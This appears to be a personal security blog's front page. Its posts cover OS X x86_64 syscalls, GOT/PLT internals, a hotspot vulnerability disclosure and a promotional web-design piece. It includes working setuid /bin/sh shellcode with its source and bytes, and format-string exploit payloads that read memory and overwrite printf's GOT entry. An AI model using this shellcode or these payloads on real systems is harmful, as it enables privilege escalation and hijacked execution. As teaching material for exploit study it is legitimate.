Security Development

Choosing a Good Web Design Team for Your Business

I remember building my first website as a young man. It was fun to spend all those hours learning how to do it. My main motivation was to show off for friends and family. I built a bunch of websites that were very basic, but they looked like masterpieces to people who knew nothing about the Internet or websites. I am very embarrassed about my efforts. I never went anywhere with it even though I considered I might make it a career back then. The company I own as an adult uses a firm that does website design in Michigan. I could not even begin to build anything now. I barely even remember a couple of basic HTML tags.

The point I am making is that we should leave some things to professionals. We should consult with people that have a proven track record of performance. I remember the early days of the Internet where small business owners were allowing employees or relatives with some web experience to build them an online presence. That never was a good idea. (more…)

T-Mobile 4G Hotspot Multiple Vulnerabilities


Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.

Link to Product on T-Mobile’s Website


  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.


Execve Syscall on OSX 10.7

I’m getting some strange behavior with shellcode that used to work on OS X 10.6. I noticed that if I don’t link with the “-static” option, I get a segfault.

; File: shell.s
; Author: Dustin Schultz -

section .text
global start

xor rdx, rdx
mov eax, 0x200003b
mov rdi, 0x68732f2f6e69622f
push rsi
push rdi
mov rdi, rsp

With static:

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -static -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
dustin@sholtz:/Users/dustin$ exit

Without static

dustin@sholtz:~$ nasm -f macho64 shell.s 
dustin@sholtz:~$ ld -arch x86_64 shell.o
dustin@sholtz:~$ ./a.out 
Segmentation fault: 11

otool has the same output:

dustin@sholtz:~$ otool -tv static 
(__TEXT,__text) section
0000000100000fe7	xorq	%rdx,%rdx
0000000100000fea	movl	$0x0200003b,%eax
0000000100000fef	movq	$0x68732f2f6e69622f,%rdi
0000000100000ff9	pushq	%rsi
0000000100000ffa	pushq	%rdi
0000000100000ffb	movq	%rsp,%rdi
0000000100000ffe	syscall
dustin@sholtz:~$ otool -tv non-static 
(__TEXT,__text) section
0000000100000f9f	xorq	%rdx,%rdx
0000000100000fa2	movl	$0x0200003b,%eax
0000000100000fa7	movq	$0x68732f2f6e69622f,%rdi
0000000100000fb1	pushq	%rsi
0000000100000fb2	pushq	%rdi
0000000100000fb3	movq	%rsp,%rdi
0000000100000fb6	syscall

The headers on the files look way different but I’m not sure exactly what is causing the issue. For instance, the non-static version has several more Load commands like LC_LOAD_DYLINKER (which is expected).

As pointed out in the comments, I was not initializing rsi correctly! Thanks for pointing that out. The fix was to add this before the last syscall:

push rdx
push rdi
mov rsi, rsp

Finding the syscall implementations in OS X

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
00000000000168ac	movl	$0x02000184,%eax
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
00000000000173f4	movl	$0x0200000d,%eax

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting setup but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx because it gets smashed by the kernel when syscall is invoked.

A Textbook Buffer Overflow: A Look at the FreeBSD telnetd Code

Wow, I feel real sorry for the FreeBSD guys having to announce a remotely exploitable vulnerability in their Telnet Daemon on Christmas Eve! Let’s just hope that nobody uses Telnet anymore. (more…)

Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap

I’ve been meaning to post about this technique I figured out while developing the OSX x86_64 setuid/shell shellcode [1] [2] I posted about last week but school and work have been pretty busy. It’s a simple technique that allows you to still test your shellcode on Unix-based OSes with non-executable stacks and heaps and can come in pretty handy for making sure your shellcode is right.


Just Arrived: Malware Analyst’s Cookbook

Author Michael Ligh was very gracious to send me a review copy of his new book Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code. I took a quick browse through it when I opened it and it looks REALLY GOOD. If it’s anything like the articles on Michael’s website, I know I’m in for a damn good read!

I’m planning on starting it this Saturday due to some other priorities so heads up for a review post in the future or check it out for yourself

Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code (Paperback)

By (author): Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard

A computer forensics “how-to” for fighting malicious code and analyzing incidents

With our ever-increasing reliance on computers comes an ever-growing risk of malware. Security professionals will find plenty of solutions in this book to the problems posed by viruses, Trojan horses, worms, spyware, rootkits, adware, and other invasive software. Written by well-known malware experts, this guide reveals solutions to numerous problems and includes a DVD of custom programs and tools that illustrate the concepts, enhancing your skills.

  • Security professionals face a constant battle against malicious software; this practical manual will improve your analytical capabilities and provide dozens of valuable and innovative solutions
  • Covers classifying malware, packing and unpacking, dynamic malware analysis, decoding and decrypting, rootkit detection, memory forensics, open source malware research, and much more
  • Includes generous amounts of source code in C, Python, and Perl to extend your favorite tools or build new ones, and custom programs on the DVD to demonstrate the solutions

Malware Analyst’s Cookbook is indispensible to IT security administrators, incident responders, forensic analysts, and malware researchers.


51 Byte x86_64 OS X Null Free Shellcode

It doesn’t seem like there’s a lot of x86_64 bit shellcode out there for the Intel Mac platforms so I figured I’d write my own and share it. I’m using Mac OS X 10.6.5 at the time of this post.


Instead of starting with the source and ending with the shellcode, we’re going to throw this one in reverse and get right to the shellcode. So here you have it, a 51 byte Mac OS X 64 bit setuid/shell-spawning shellcode

 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X / Intel x86_64
 *  Created on: Nov 25, 2010
 *      Author: Dustin Schultz -
char shellcode[] =


And now for the source in NASM/YASM syntax. If you’ve never done system calls on 64bit OS X and you’re confused, be sure to read my post on64 bit system calls in os x.

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz -

section .text
global start

 mov r8b, 0x02          ; Unix class system calls = 2 
 shl r8, 24             ; shift left 24 to the upper order bits
 or r8, 0x17            ; setuid = 23, or with class = 0x2000017
 xor edi, edi           ; zero out edi 
 mov rax, r8            ; syscall number in rax 
 syscall                ; invoke kernel
 jmp short c            ; jump to c
 pop rdi                ; pop ret addr which = addr of /bin/sh
 add r8, 0x24           ; execve = 59, 0x24+r8=0x200003b
 mov rax, r8            ; syscall number in rax 
 xor rdx, rdx           ; zero out rdx 
 push rdx               ; null terminate rdi, pushed backwards
 push rdi               ; push rdi = pointer to /bin/sh
 mov rsi, rsp           ; pointer to null terminated /bin/sh string
 syscall                ; invoke the kernel
 call b                 ; call b, push ret of /bin/sh
 db '/bin//sh'          ; /bin/sh string

I would never blindly use shellcode without testing it out my self (unless it’s from a trusted source like Metasploit)

nobody@nobody:~/$ nasm -f macho64 setuid_shell_x86_64.asm 
nobody@nobody:~/$ ld -arch x86_64 setuid_shell_x86_64.o
nobody@nobody:~/$ ./a.out 

And the final byte representation (verify against C source above)

nobody@nobody:~/$ otool -t setuid_shell_x86_64.o
(__TEXT,__text) section
0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52 
0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f 
0000000000000030 2f 73 68 

And that’s all. Be sure to checkback in the future or subscribe to my RSS feed. I definitely have more shellcode to come!

Mac OS X 64 bit Assembly System Calls

After reading about shellcode in Chapter 5 of Hacking: The Art of Exploitation, I wanted to go back through some of the examples and try them out. The first example was a simple Hello World program in Intel assembly. I followed along in the book and had no problems reproducing results on a 32 bit Linux VM using nasm with elf file format and ld for linking.

Then I decided I wanted to try something similar but with a little bit of a challenge: write a Mac OS X 64 bit “hello world” program using the new fast ‘syscall’ instruction instead of the software interrupt based (int 0×80) system call, this is where things got interesting.

First and foremost, the version of Nasm that comes with Mac OS X is a really old version. If you want to assemble macho64 code, you’ll need to download the lastest version.

nobody@nobody:~$ nasm -v
NASM version 2.09.03 compiled on Oct 27 2010

I figured I could replace the extended registers with the 64 bit registers and the int 0×80 call with a syscall instruction so my first attempt was something like this

section .data
hello_world     db      "Hello World!", 0x0a

section .text
global _start

mov rax, 4              ; System call write = 4
mov rbx, 1              ; Write to standard out = 1
mov rcx, hello_world    ; The address of hello_world string
mov rdx, 14             ; The size to write
syscall                 ; Invoke the kernel
mov rax, 1              ; System call number for exit = 1
mov rbx, 0              ; Exit success = 0
syscall                 ; Invoke the kernel

After assembling and linking, I got this

nobody@nobody:~$ nasm -f macho64 helloworld.s
nobody@nobody:~$ ld helloworld.o 
ld: could not find entry point "start" (perhaps missing crt1.o) for inferred architecture x86_64

Apparently Mac OS X doesn’t use ‘_start’ for linking, instead it just uses ‘start’. After removing the underscore prefix from start, I was able to link but after running, I got this

nobody@nobody:~$ ./a.out
Bus error

I was pretty stumped at this point so I headed off to Google to figure out how I was supposed to use the ‘syscall’ instruction. After a bunch of confusion, I stumbled upon the documentation and realized that x86_64 uses entirely different registers for passing arguments. From the documentation:

The number of the syscall has to be passed in register rax.

rdi - used to pass 1st argument to functions
rsi - used to pass 2nd argument to functions
rdx - used to pass 3rd argument to functions
rcx - used to pass 4th argument to functions
r8 - used to pass 5th argument to functions
r9 - used to pass 6th argument to functions

A system-call is done via the syscall instruction. The kernel destroys registers rcx and r11.

So I tweaked the code with this new information

mov rax, 4              ; System call write = 4
mov rdi, 1              ; Write to standard out = 1
mov rsi, hello_world    ; The address of hello_world string
mov rdx, 14             ; The size to write
syscall                 ; Invoke the kernel
mov rax, 1              ; System call number for exit = 1
mov rdi, 0              ; Exit success = 0
syscall                 ; Invoke the kernel

And with high hopes that I’d see “Hello World!” on the console, I still got the exact same ‘Bus error’ after assembling and linking. Back to Google to see if others had tried a write syscall on Mac OS X. I found a few posts of people having success with the syscall number 0×2000004 so I thought I’d give it a try. Similarly, the exit syscall number was 0×2000001. I tweaked the code and BINGO! I was now able to see “Hello World” output on my console but I was seriously confused at this point; what was this magic number 0×200000 that is being added to the standard syscall numbers?

I looked in syscall.h to see if this was some sort of padding (for security?) I greped all of /usr/include for 0×2000000 with no hints what-so-ever. I looked into the Mach-o file format to see if it was related to that with no luck.

After about an hour and a half of looking, I spotted what I was looking for in ‘syscall_sw.h’

 * Syscall classes for 64-bit system call entry.
 * For 64-bit users, the 32-bit syscall number is partitioned
 * with the high-order bits representing the class and low-order
 * bits being the syscall number within that class.
 * The high-order 32-bits of the 64-bit syscall number are unused.
 * All system classes enter the kernel via the syscall instruction.
 * These are not #ifdef'd for x86-64 because they might be used for
 * 32-bit someday and so the 64-bit comm page in a 32-bit kernel
 * can use them.

#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */

Mac OS X or likely BSD has split up the system call numbers into several different “classes.” The upper order bits of the syscall number represent the class of the system call, in the case of write and exit, it’s SYSCALL_CLASS_UNIX and hence the upper order bits are 2! Thus, every Unix system call will be (0×2000000 + unix syscall #).

Armed with this information, here’s the final x86_64 Mach-o “Hello World”

section .data
hello_world     db      "Hello World!", 0x0a

section .text
global start

mov rax, 0x2000004      ; System call write = 4
mov rdi, 1              ; Write to standard out = 1
mov rsi, hello_world    ; The address of hello_world string
mov rdx, 14             ; The size to write
syscall                 ; Invoke the kernel
mov rax, 0x2000001      ; System call number for exit = 1
mov rdi, 0              ; Exit success = 0
syscall                 ; Invoke the kernel
nobody@nobody:~$ nasm -f macho64 helloworld.s
nobody@nobody:~$ ld helloworld.o 
nobody@nobody:~$ ./a.out
Hello World!

Simple HTTP Server Detector

The preamble to this post is that you can do this in a few lines with CURL, telnet, wget etc. I’m also sure someone has already written one of these but coming from a Java background, it was useful for me (and may be to others) to write a simple application that uses sockets in C.

very Simple HTTP Server Detector 1.0

(I was laughing when I wrote that title)

nobody@nobody:~/$ ./detect
Usage: ./detect < domainname >

Output looks like this

nobody@nobody:~/$ ./detect
Server: Microsoft-IIS/7.5

nobody@nobody:~/$ ./detect
Server: Apache

nobody@nobody:~/$ ./detect
Server: gws

nobody@nobody:~/$ ./detect
Server: unknown

nobody@nobody:~/$ ./detect
Server: AkamaiGHost

nobody@nobody:~/$ ./detect
Server: hi <=== LOL!!

If you’re new to C, see if you can come up with an implementation on your own and then check out the reference below (heavily commented for understanding):

 * Simple HTTP Server Detector
 * Copyleft 2010.
 * All rights have been wronged.
 *  Created on: Oct 5, 2010
 *      Author: xploit
#include <stdio.h> /* Printf, perror, etc */
#include <stdlib.h> /* exit */
#include <sys/socket.h> /* sockets */
#include <netinet/in.h>
#include <netdb.h> /* Host lookup */
#include <string.h> /* bzero */

/* HTTP port */
#define WEB_PORT 80
/* Receive buffer size */
#define RECV_BUF 1024
/* Server buffer size */
#define SRVR_BUF 256

void fatal(char *error);

int main(int argc, char **argv) {

	int socket_fd, i;
	struct sockaddr_in remote_addr;
	struct hostent *remote_host;
	char recv_buf[RECV_BUF], srvr[SRVR_BUF];

	if (argc < 2) {
		printf("Usage: %s <domainname>n", argv[0]);

	/* Create a socket */
	if ((socket_fd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		fatal("Failed to create socketn");

	/* Resolve the domain name */
	if ((remote_host = gethostbyname(argv[1])) == NULL) {
		fatal("Failed to resolve domain namen");

	/* Set address and port of remote host */
	memcpy(&(remote_addr.sin_addr), remote_host->h_addr_list[0],
	remote_addr.sin_family = AF_INET;
	remote_addr.sin_port = htons(WEB_PORT);

	/* Zero out the rest of the struct */
	memset(&(remote_addr.sin_zero), 0, 8);

	/* Connect to the domain */
	if ((connect(socket_fd, (struct sockaddr *) &remote_addr,
			sizeof(struct sockaddr))) == -1) {
		fatal("Unable to connect to domainn");

	/* Send a HTTP head req */
	if ((send(socket_fd, "HEAD / HTTP/1.0rnrn", 19, 0)) == -1) {
		fatal("Error sending HEAD requestn");

	/* Receive the response */
	if ((recv(socket_fd, &recv_buf, 1024, 0)) == -1) {
		fatal("Error reading HEAD responsen");

	/* Find the server substring */
	char *srvr_ptr = strstr(recv_buf, "Server:");

	/* Fail if it wasn't found */
	if (srvr_ptr == NULL) {
		fatal("Server: unknownn");

	/* Read server line*/
	i = 0;
	while (srvr_ptr[i] != 'n' && i < SRVR_BUF) {
		srvr[i] = srvr_ptr[i];
	/* Terminate String */
	srvr[i] = '\0';

	/* Clear string */
	srvr_ptr = NULL;

	/* Print the results */
	printf("%sn", srvr);

	/* Stop both reception and transmission */
	shutdown(socket_fd, 2);

	return 0;

// Prints an error and exits
void fatal(char *error) {

How is glibc loaded at runtime?

I’ve been looking into address-space randomization. ASLR relies on randomizing the based address of things like shared libraries, making return-to-libc attacks more difficult. I understood the basics of ASLR but I still had a lot of questions. How are shared libraries, like libc, loaded at runtime? What is the global offset table? What is the procedure linkage table? What is a position independent executable? In this post, we’re going to look at all of these.

Back in the Day

In “the olden days” libraries used to be hard coded to be loaded at a fixed address in memory space. Runtime linkers had to deal with relocating conflicting hard coded addresses. Windows, to some extent, still does this.

PIC – Position Independent Code

Then came along Position Independent Code which simply means that the code (usually shared libraries) can be loaded at any address in memory-space and relocations are no longer a problem. In order to do that, binaries added sections for the GOT and the PLT.

Global Offset Table

Every ELF executable has a section called the Global Offset Table or the GOT for short. This table is responsible for holding the absolute addressof functions in shared libraries linked dynamically at runtime.

nobody@nobody:~$ objdump -R ./hello_world

./hello_world:     file format elf32-i386

OFFSET   TYPE              VALUE
08049564 R_386_GLOB_DAT    __gmon_start__
08049574 R_386_JUMP_SLOT   __gmon_start__
08049578 R_386_JUMP_SLOT   __libc_start_main
0804957c R_386_JUMP_SLOT   printf
Procedure Linkage Table

Just like the GOT, every ELF executable also has a section called the Procedure Linkage Table or PLT for short (not to be confused with BLT (Bacon Lettuce Tomato) ). If you’ve read disassembled code, you’ll often see function calls like ‘printf@plt,” that’s a call to the printf in the procedure linking table. The PLT is sort of like the spring board that allows us to resolve the absolute addresses of shared libraries at runtime.

nobody@nobody:~$ objdump -d -j .plt ./hello_world

./hello_world:     file format elf32-i386

Disassembly of section .plt:

08048270 <__gmon_start__@plt-0x10>:
 8048270:       ff 35 6c 95 04 08       pushl  0x804956c
 8048276:       ff 25 70 95 04 08       jmp    *0x8049570
 804827c:       00 00                   add    %al,(%eax)

08048280 <__gmon_start__@plt>:
 8048280:       ff 25 74 95 04 08       jmp    *0x8049574
 8048286:       68 00 00 00 00          push   $0x0
 804828b:       e9 e0 ff ff ff          jmp    8048270 <_init+0x18>

08048290 <__libc_start_main@plt>:
 8048290:       ff 25 78 95 04 08       jmp    *0x8049578
 8048296:       68 08 00 00 00          push   $0x8
 804829b:       e9 d0 ff ff ff          jmp    8048270 <_init+0x18>

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>
The GOT, The PLT, and the Linker

How do these all work together to load a shared library at runtime? Well it’s actually pretty cool. Lets walk through the first call to printf. Printf@plt, which is not really printf but a location in the PLT, is called and the first jump is executed.

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

Notice that this jump is a pointer to an address. We’re going to jump to the address pointed to by this address. The 0x804957c is an address in the GOT. The GOT will eventually hold the absolute address call to printf, however, on the very first call the address will point back to the instruction after the jump in the PLT – 0x80482a6. We can see this below by looking at the output of the GOT. Essentially we’ll execute all of the instructions of the printf@plt the very first call.

(gdb) x/8x 0x804957c-20
0x8049568 <_GLOBAL_OFFSET_TABLE_>:      0x0804949c      0xb80016e0      0xb7ff92f0      0x08048286
0x8049578 <_GLOBAL_OFFSET_TABLE_+16>:   0xb7eafde0      0x080482a6      0x00000000      0x00000000

In the PLT code, an offset is pushed onto the stack and another jmp is executed

080482a0 <printf@plt>:
 80482a0:       ff 25 7c 95 04 08       jmp    *0x804957c
 80482a6:       68 10 00 00 00          push   $0x10
 80482ab:       e9 c0 ff ff ff          jmp    8048270 <_init+0x18>

This jump is a jump into the eventual runtime linker code that will load the shared library which contains printf. The offset, $0×10, that was pushed onto the stack tells the linker code the offset of the symbol in the relocation table (see objdump -R ./hello_world output above), printf in this case. The linker will then write the address of printf into the GOT at 0x804957c. We can see this if we look at the GOT after the library has been loaded.

(gdb) x/8x 0x804957c-20
0x8049568 <_GLOBAL_OFFSET_TABLE_>:      0x0804949c      0xb80016e0      0xb7ff92f0      0x08048286
0x8049578 <_GLOBAL_OFFSET_TABLE_+16>:   0xb7eafde0      0xb7edf620      0x00000000      0x00000000

Notice that the previous address, 0x80482a6, has been replaced by the linker with 0xb7edf620. To confirm that this indeed is the address for printf, we can start a disassemble at this address

(gdb) disassemble 0xb7edf620
Dump of assembler code for function printf:

Since the library is now loaded and the GOT has been overwritten with the absolute address to printf, subsequent calls to the function printf@plt will jump directly to the address of printf!

All of this also has the added benefit that a shared library is not loaded until a function in it’s library is loaded — in other words, a nice form of “lazy-loading!”

Learning about malware analysis

Like my previous post on wanting to learn more about rootkits, I’d love to learn more about malware analysis. How do antivirus companies reverse engineer malware that they find? How does the FBI get clues to the original of malware? I’m sure there is tons of stuff online to read but I’m also going to check out this book (so much to learn!)

Malware Forensics: Investigating and Analyzing Malicious Code covers the emerging and evolving field of “live forensics,” where investigators examine a computer system to collect and preserve critical live data that may be lost if the system is shut down. Unlike other forensic texts that discuss “live forensics” on a particular operating system, or in a generic context, this book emphasizes a live forensics and evidence collection methodology on both Windows and Linux operating systems in the context of identifying and capturing malicious code and evidence of its effect on the compromised system.
Malware Forensics: Investigating and Analyzing Malicious Code also devotes extensive coverage of the burgeoning forensic field of physical and process memory analysis on both Windows and Linux platforms. This book provides clear and concise guidance as to how to forensically capture and examine physical and process memory as a key investigative step in malicious code forensics.
Prior to this book, competing texts have described malicious code, accounted for its evolutionary history, and in some instances, dedicated a mere chapter or two to analyzing malicious code. Conversely, Malware Forensics: Investigating and Analyzing Malicious Code emphasizes the practical “how-to” aspect of malicious code investigation, giving deep coverage on the tools and techniques of conducting runtime behavioral malware analysis (such as file, registry, network and port monitoring) and static code analysis (such as file identification and profiling, strings discovery, armoring/packing detection, disassembling, debugging), and more.

* Winner of Best Book Bejtlich read in 2008!
* Authors have investigated and prosecuted federal malware cases, which allows them to provide unparalleled insight to the reader.
* First book to detail how to perform “live forensic” techniques on malicous code.
* In addition to the technical topics discussed, this book also offers critical legal considerations addressing the legal ramifications and requirements governing the subject matter

I’d love to get my hands on some of these binaries and dive in. If anyone happens to have any of these to analyze, please contact me!
Zues Bot


ASLR, Dynamic Linkers, & Mmap

Well I had hoped to learn more about Address Space Layout Randomization (ASLR) and blog about it after reading “On the Effectiveness of Address-Space Layout Randomization.” I got about a quarter of the way through the paper and realized that I need to better understand address space layout in general. Where is libc in memory and how do programs get access to it?

I’ve been Googling and reading for the last 3.5 hours and am somewhat more informed but I’m still trying to figure it all out.

Every ELF executable on Linux invokes the dynamic linker which is the bootstrap for finding and loading all other shared libraries (.so extensions). I think that the linker uses mmap() to memory map the shared libraries from the disk into virtual address space but I’m still somewhat confused on this part.

Mmap was another thing I wasn’t familiar with. Memory mapped files essentially allow a program to refer to a file as if it were in memory by paging in page sized chunks into memory. For writing files, it has the advantage that many small writes will happen to memory and then the virtual memory manager will write the page all at once to disk. I’m still trying to figure out what the advantage of mmap’ing shared libraries is. For shared libraries, mmap is used to map the shared library into the processes address space as if the process contained library in it’s memory. According to what I read, mmap can be used to map “shared memory objects” as well as files, etc. Basically anything that has a file descriptor can be memory mapped.

I’m wondering if the operating system loads very common and essential libraries like glibc into physical memory and then mmap’s them to the processes virtual address space or if it memory maps the actual file on disk like I mentioned above (i.e. /usr/lib/

So far the best material I’ve found related to these subjects was

and one that looks good but I haven’t had a chance to read yet this one is especially good:

Format String Vulnerabilities:Part 2

In part one of Format String Vulnerabilities I showed you some simple code with a very serious format string vulnerability. I showed you how you could exploit this vulnerability to read any part of memory. In section two, I’m going to show you how you can write to any address in memory!

Writing to Memory

Exploiting format string vulnerabilities is all about providing input that uses a format character that expects its value to be passed by reference and you control that reference. I used ‘%s’ to read from memory. I’m going to use %n to write to memory.

%n	      Number of characters written by this printf.

Lucky for us, there is a really easy way to control the number of characters written by printf. When you specify a format character, you can optionally give it an integer for the width of the format character.

%#x	      Number of characters prepended as padding.

We can use this to control how many characters are written by printf.

If you’re following at this point, you’re probably wondering how we’re going to use %n to write to memory. We can use %n to write the integer value of our 4 byte target address one byte at a time.

We can write the lower order bits and shift the target address by a byte, utilizing width padding characters to control the integer value we write to a given byte.

Target = 0xAAAA1111
0xAAAA1111 = <int>
0xAAAA1112 = <int>
0xAAAA1113 = <int>
0xAAAA1114 = <int>

If we can overwrite an address, we can control the flow of execution. Let’s overwrite the address of printf! First we need to find the address for printf

nobody@nobody:~$ objdump -R ./text_to_print
08049660 R_386_JUMP_SLOT   printf

Next we need to craft a string to overwrite this address using %n and width padding. We’ll also use printf’s ability to argument swap:

One can also specify explicitly which argument is taken
by writing '%m$' instead of '%'

Lastly, instead of writing a byte at a time, we can use printf’s ‘length modifier’ to tell printf what type it’s writing %n too. We’ll use ‘l’ (ell) for long unsigned int.

0x0000beef seems like a good address to overwrite printf with since everyone loves beef! Our input will be a 4 byte address (to printf) and the decimal value of beef – 4 (to accommodate the length of the address) = 48875.

Here’s what It looks like when we run it (note we have to escape the $ with a for the shell):

nobody@nobody:~$ ./text_to_print $(python -c 'print "x60x96x04x08"')%48875x%4$ln

Program received signal SIGSEGV, Segmentation fault.
0x0000beef in ?? ()

You can see that the program tried to jump to 0x0000beef and crashed! Be sure to check out the full section on format string vulnerabilities inHacking: The Art of Exploitation, it talks all about these techniques and more.

Format String Vulnerabilities:Part 1

I have to admit that I’ve heard of format string vulnerabilities but I never knew exactly what they were. After reading about them in Hacking: The Art of Exploitation I’m surprised I didn’t know more about them since they are extremely dangerous! Take this code for instance:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];

   if(argc < 2) {
      printf("Usage: <text to print>n", argv[0]);
   strncpy(text, argv[1], 1024);


   return EXIT_SUCCESS;

Normal usage would look like this:

nobody@nobody:~$ ./text_to_print "Hello World!"
Hello World!

Looks harmless right? It’s not! This code is very vulnerable to a format string vulnerability. The problem is, the call to printf, should have been:

 printf("%s", text);

Why does it matter? Well the way that printf works is that all of the variable arguments for the format strings are passed in reverse order onto the stack. Printf then parses the input until it reaches a format character and references the argument on the stack based on the index of the format character.

If we specially craft the input to take format characters, printf will mistakenly reference previous elements on stack. We can use this to effectively read the stack. For instance

nobody@nobody:~$ ./text_to_print "AAAA %x %x %x %x"
AAAA bffff9ba 3f0 0 41414141

It gets better though! The previous stack frame before printf is called contains the string argument passed to printf. Did you notice in the output above, the last ‘%x’ printed the first ‘AAAA’?

We can use this to read the contents of any memory address by putting the address we want to read at the first of the string, followed by 3 stack positions (8 bytes each), and then putting a ‘%s’ format character at the 4th position to read our address. Like this (the ‘+’ is used to separate for readability)

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")%08x%08x%08x%s

or with Python like this

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")$(python -c 'print "%08x+"*3')%s

00000000 is the contents of address xbffff834!

More to come on using format string vulnerabilities to write to any place in memory in Part Two of Format String Vulnerabilities!

Go to Top